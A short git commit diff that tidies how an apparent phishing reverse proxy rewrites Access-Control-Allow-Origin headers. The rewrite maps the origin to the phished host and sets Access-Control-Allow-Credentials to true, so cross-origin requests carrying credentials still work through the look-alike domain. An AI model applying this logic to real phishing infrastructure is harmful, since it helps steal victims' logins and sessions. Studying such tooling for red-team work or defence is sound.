small tweak to handle Access-Control-Allow-Origin header

2020-09-21 16:17:19 +02:00 · 2020-09-21 16:17:19 +02:00 · 09e78a96b4
commit 09e78a96b4
parent 5fc43f4be9
1 changed files with 6 additions and 9 deletions
--- a/core/http_proxy.go
+++ b/core/http_proxy.go
@ -606,16 +606,13 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
 			}

 			allow_origin := resp.Header.Get("Access-Control-Allow-Origin")
-			if allow_origin != "" {
-				if allow_origin != "*" {
-					if u, err := url.Parse(allow_origin); err == nil {
-						if o_host, ok := p.replaceHostWithPhished(u.Host); ok {
-							resp.Header.Set("Access-Control-Allow-Origin", u.Scheme+"://"+o_host)
-						}
-					} else {
-						log.Warning("can't parse URL from 'Access-Control-Allow-Origin' header: %s", allow_origin)
-						resp.Header.Set("Access-Control-Allow-Origin", "*")
+			if allow_origin != "" && allow_origin != "*" {
+				if u, err := url.Parse(allow_origin); err == nil {
+					if o_host, ok := p.replaceHostWithPhished(u.Host); ok {
+						resp.Header.Set("Access-Control-Allow-Origin", u.Scheme+"://"+o_host)
 					}
+				} else {
+					log.Warning("can't parse URL from 'Access-Control-Allow-Origin' header: %s", allow_origin)
 				}
 				resp.Header.Set("Access-Control-Allow-Credentials", "true")
 			}